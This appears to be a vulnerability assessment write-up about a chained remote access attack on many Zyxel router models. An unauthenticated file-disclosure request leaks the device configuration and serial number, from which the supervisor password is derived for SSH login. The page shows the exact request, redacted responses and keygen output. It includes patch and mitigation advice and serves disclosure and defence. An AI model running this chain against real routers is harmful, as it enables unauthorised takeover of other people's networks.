Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
3

Zyxel router chained RCE using LFI and Weak Password Derivation Algorithm (No CVE)
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Initial Access
Techniques
Validation
Validated
Validated

Description

Multiple Zyxel devices are prone to different critical vulnerabilities resulting from insecure coding practices and insecure configuration.
Besides the unauthenticated buffer overflow in the zhttpd webserver, two other vulnerabilities, the unauthenticated local file disclosure (LFI) in combination with a weak password derivation algorithm for user supervisor can be used to establish an unauthenticated RCE.

The remote code execution (RCE) vulnerability can be exploited by chaining the local file disclosure (LFI) vulnerability in the zhttpd binary that allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.

With this information disclosure, the attacker can determine if the router is reachable via SSH and use the second vulnerability in the zcmd binary to derive the supervisor password by exploiting a weak password derivation algorithm using the device serial number.

The following devices are affected:

AMG1302-T11C EOL
VMG3925-B10C EOL
VMG8924-B10D EOL
VMG1312-B10D EOL
VMG3312-T20A EOL
VMG3625-T20A EOL
VMG3925-B10B EOL
VMG3925-B10C EOL
VMG3925-B30C EOL
VMG3926-B10A EOL
VMG5313-B10B EOL
VMG5313-B30B EOL
VMG8623-T50A EOL
VMG8823-B10B EOL
VMG8823-B30B EOL
VMG8823-B50B EOL
VMG8823-B60B EOL
VMG8924-B10D EOL
VMG8924-B30D EOL
PMG5317-T20A EOL

DX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*
DX5401-B0 V5.17(ABYO.1)C0*
EMG3525-T50B EMEA – V5.50(ABPM.6)C0* || S. America – V5.50(ABSL.0)b12 in Sep. 2022*
EMG5523-T50B EMEA – V5.50(ABPM.6)C0* || S. America – V5.50(ABSL.0)b12 in Sep. 2022*
EMG5723-T50K V5.50(ABOM.7)C0*
EX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*
EX5401-B0 V5.17(ABYO.1)C0*
EX5501-B0 V5.17(ABRY.2)C0*
LTE3301-PLUS V1.00(ABQU.3)C0*
LTE7240-M403 V2.00(ABMG.4)C0*
VMG1312-T20B V5.50(ABSB.5)C0*
VMG3625-T50B V5.50(ABPM.6)C0*
VMG3927-B50A V5.17(ABMT.6)C0*
VMG3927-B60A V5.17(ABMT.6)C0*
VMG3927-T50K V5.50(ABOM.7)C0*
VMG4005-B50A V5.15(ABQA.2)C0 in Mar. 2022*
VMG8623-T50B V5.50(ABPM.6)C0*
VMG8825-B50A V5.17(ABMT.6)C0*
VMG8825-B50B V5.17(ABNY.7)C0*
VMG8825-B60A V5.17(ABMT.6)C0*
VMG8825-B60B V5.17(ABNY.7)C0*
VMG8825-T50K V5.50(ABOM.7)C0*
XMG3927-B50A V5.17(ABMT.6)C0*
XMG8825-B50A V5.17(ABMT.6)C0*

Firewall:
VPN2S V1.20(ABLN.2)_00210319C1*

ONT:
AX7501-B0 V5.17(ABPC.1)C0*
EP240P V5.40(ABVH.1)C0 in May 2022*
PMG5317-T20B V5.40(ABKI.4)C0 in Apr. 2022*
PMG5617GA V5.40(ABNA.2)C0 in Apr. 2022*
PMG5622GA V5.40(ABNB.2)C0 in Apr. 2022*

WiFi extender:
WX3100-T0 V5.50(ABVL.1)C0 in Mar. 2022*
WX3401-B0 V5.17(ABVE.1)C0*

WiFi system:
WSQ50 (Multy X) V2.20(ABKJ.7)C0
WSQ60 (Multy Plus) V2.20(ABND.8)C0

Add Assessment

3
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Common in enterpriseEasy to weaponizeGives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

In December 2022, SEC Consult released a blog with the title The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users . The blog explains an unauthenticated buffer overflow in more then 40 different Zyxel router models and the fast amount of thousands of routers that are vulnerable and accessible via the Internet.
The impact is still quite limited because the published Metasploit exploit module only works from the LAN side.

However, the Unauthenticated Buffer Overflow is not the only vulnerability on these routers and SEC Consult discovered another 7 vulnerabilities that are described in their security analysis Multiple Critical Vulnerabilities in multiple Zyxel devices.
While reading the security analysis and reviewing the other vulnerabilities, I discovered a new opportunity to build an exploit by chaining two other vulnerabilities that will allow an unauthenticated attacker to get privileged access to the Zyxel router from either the WAN or LAN side. The potential of this exploit to attack from the WAN side makes it quite dangerous taking into account the large number of non-patched Zyxel routers out there on the Internet.

Recently, CVE-2023-28770 has been released covering the LFI vulnerability that is used in this chained exploit.

Zyxel router chained RCE

Exploiting an unauthenticated local file disclosure (LFI) vulnerability and a weak password derivation algorithm

The first vulnerability that stood out to me is the LFI vulnerability that is discussed in section 2 of the Security Analysis by SEC Consult.
The LFI vulnerability is present in the zhttp binary that allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.

The burp request below shows a redacted response of the information that is disclosed such as encrypted passwords, account information, information on services configuration (FTP, Telnet, SSH), and hardware details such as serial number, hardware model etc. In total around 4000 lines of nested JSON information that you would not like to share with anyone out there.

LFI Burp request and response

GET /Export_Log?/data/zcfg_config.json HTTP/1.1
Host: zyxel-vuln-router:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Connection: close

Response (REDACTED)

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 148678
Date: Fri, 14 Apr 2023 08:47:46 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'

---- Hardware Information ----
{
    "Manufacturer":"ZYXEL",
    "ManufacturerOUI":"XXXXX",
    "ModelName":"VMG3625-T20A",
    "Description":"Wireless AC VDSL2 4-port Gateway with USB",
    "ProductClass":"VMG3625-T20A",
    "SerialNumber":"SXXXXXXXXXXXX",
    "SoftwareVersion":"V5.30(ABOU.2)b1_I0_20180821",
    "AdditionalHardwareVersion":"",
    "AdditionalSoftwareVersion":"",
    "UpTime":607055,
    "FirstUseDate":"2023-03-21T09:07:41",
    "VendorConfigFileNumberOfEntries":0,
    "SupportedDataModelNumberOfEntries":0,
    "ProcessorNumberOfEntries":0,
    "VendorLogFileNumberOfEntries":0,
    "LocationNumberOfEntries":0,
    "FixManufacturerOUI":""
  },

---- Account Information----
"X_ZYXEL_LoginCfg":{
    "LoginGroupConfigurable":true,
    "LogGp":[
      {
        "GP_Privilege":"_encrypt_XXXXXXXXXXXXXX",
        "Account":[
          {
            "AutoShowQuickStart":false,
            "Enabled":true,
            "EnableQuickStart":true,
            "Page":"",
            "Username":"root",
            "Password":"",
            "PasswordHash":"",
            "Privilege":"_encrypt_XXXXXXXXXXXXX",
            "GetConfigByFtp":true,
            "DefaultPassword":"_encrypt_XXXXXXXXXXXXXX",
            "DefaultGuiPassword":"",
            "ResetDefaultPassword":false,
            "shadow":"root:$6$XXXXXXXXXXX:0::::::\n",
            "smbpasswd":"root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U          ]:LCT-0000004E:\n",
            "ConfigAccountFromWAN":false,
            "DefPwLength":8,
            "AccountCreateTime":0,
            "AccountRetryTime":3,
            "AccountIdleTime":300,
            "AccountLockTime":300,
            "RemoHostAddress":"",
            "DotChangeDefPwd":false,
            "ShowSkipBtnInChgDefPwdPage":false,
            "AutoGenPwdBySn":false,
            "RemoteAccessPrivilege":"LAN",
            "OldDefaultPassword":"",
            "CardOrder":"",
            "ThemeColor":"",
            "HiddenPage":""
          },
          {
            "AutoShowQuickStart":false,
            "Enabled":true,
            "EnableQuickStart":true,
            "Page":"",
            "Username":"supervisor",
            "Password":"",
            "PasswordHash":"",
            "Privilege":"_encrypt_XXXXXXXXXXX",
            "DefaultPassword":"_encrypt_XXXXXXXXXXX",
            "DefaultGuiPassword":"",
            "ResetDefaultPassword":false,
            "shadow":"supervisor:$6$XXXXXXXXXX:0::::::\n",
            "smbpasswd":"supervisor:12:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U          ]:LCT-0000004E:\n",
            "ConfigAccountFromWAN":false,
            "DefPwLength":8,
            "AccountCreateTime":0,
            "AccountRetryTime":3,
            "AccountIdleTime":300,
            "AccountLockTime":300,
            "RemoHostAddress":"",
            "DotChangeDefPwd":false,
            "ShowSkipBtnInChgDefPwdPage":false,
            "AutoGenPwdBySn":false,
            "RemoteAccessPrivilege":"LAN",
            "OldDefaultPassword":"",
            "CardOrder":"",
            "ThemeColor":"",
            "HiddenPage":""
          }
        ],
        "Level":"high"
      },

---- Service Information ----
  "X_ZYXEL_RemoteManagement":{
    "Service":[
      {
        "Name":"HTTP",
        "Enable":true,
        "Protocol":6,
        "Port":8080,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":1,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"HTTPS",
        "Enable":true,
        "Protocol":6,
        "Port":443,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"FTP",
        "Enable":true,
        "Protocol":6,
        "Port":21,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"TELNET",
        "Enable":true,
        "Protocol":6,
        "Port":23,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"SSH",
        "Enable":true,
        "Protocol":6,
        "Port":22,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },

Now this information disclosure in itself will not pose a direct threat to these routers, but of course attackers could try to crack the obtained encrypted shadow passwords, but this will take a long time.

So is there any other way to use the disclosed information for a successful attack?
And of course the answer is YES!

The second vulnerability that comes into play is the vulnerability described in section 3 of the analysis, “Unsafe Storage of Sensitive Data”.
It explains the password derivation technique used to decrypt the _encrypted_XXXXXX passwords in the JSON configuration file using a static AES Key and IV.
But my attention was more drawn to another analysis Getting root on a Zyxel VMG8825-T50 router done by Thomas Rinsma in 2020 that was referenced at the bottom of the section and where Thomas explains the password derivation techniques used on Zyxel routers.
In particular, section “Tangent 2: key and password derivation mechanisms” is quite interesting which describes in detail how the supervisor user password can be derived using the serial key of the router.

So what if we use the LFI vulnerability to get the serial key of the router and try to crack the supervisor password using this password derivation technique.
We can then use the disclosed router services information to check if ssh or telnet is enabled and accessible from the WAN and try to login as supervisor to gain access to the router.

Bogi Napoleon Wennerstrøm has reverse engineered and implemented some of these derivation functions producing the supervisor password.
His repository can be found here on Github.
I tested his password derivation functions and indeed I can confirm that either zcfgBeCommonGenKeyBySerialNumMethod2 or zcfgBeCommonGenKeyBySerialNumMethod3 are working on vulnerable Zyxel routers.

# python ./main.py SXXXXXXXXXXXX <= redacted
zcfgBeCommonGenKeyBySerialNum                   : L8PBA3JD6H
zcfgBeCommonGenKeyBySerialNum_CBT               : 4a88dfa2
zcfgBeCommonGenKeyBySerialNumMethod2            : 4a88dfa2
=> zcfgBeCommonGenKeyBySerialNumMethod3         : aN66Q5D31Y <=
zcfgBeCommonGenKeyBySerialNumConfigLength(1)    : 778V3W7O
zcfgBeCommonGenKeyBySerialNumConfigLength(2)    : Yd3HvMpU
zcfgBeCommonGenKeyBySerialNumConfigLength(3)    : dByHvMzZ
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(1) : 778V3W7O
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(2) : Yd3HvMpU
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(3) : dByHvMzZ
┌──(root💀cuckoo)-[~/zyxel_exploit/zyxel-vmg8825-keygen]
└─# ssh supervisor@zyxel-vuln-router
supervisor@zyxel-vuln-router's password:
$ uname -a
Linux VMG3625-T20A 2.6.36 #7 SMP Sat Aug 18 12:18:02 CET 2018 mips GNU/Linux
$ id
uid=12(supervisor) gid=12 groups=12
$

I have created a Metasploit module that chains these two vulnerabilities together to gain access to vulnerable Zyxel routers.
PR submission to mainstream Metasploit is in progress.

Mitigation

Please follow this Security Advisory of Zyxel to patch your router.
As temporary measure, you should disable all your services on the router such as telnet, ftp and ssh that allows access to the supervisor user and configure your web interface only to be accessible by the admin user.

References

CVE-2023-28770
The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users .
Multiple Critical Vulnerabilities in multiple Zyxel devices.
Getting root on a Zyxel VMG8825-T50 router
Zyxel VMG8825-T50 Supervisor Keygen – Github
Zyxel Security Advisory
Metasploit PR: Zyxel router chained RCE using LFI and weak password derivation algorithm

Credits

Credits goes to:
SEC Consult team
Thomas Rinsma
Bogi Napoleon Wennerstrøm

Log in to Add Reply

General Information

Offensive Application
remote
Utility Class
rce
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
S. Robertz
S. Viehböck
G. Hechenberger
T. Weber
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Sec Consult

Additional Info

Authenticated
Never
Exploitable
Sometimes
Reliability
Strong
Stability
Very Strong
Available Mitigations
Very Weak
Shelf Life
Long
Userbase/Installbase
Large
Patch Effectiveness
Very High
Technical Analysis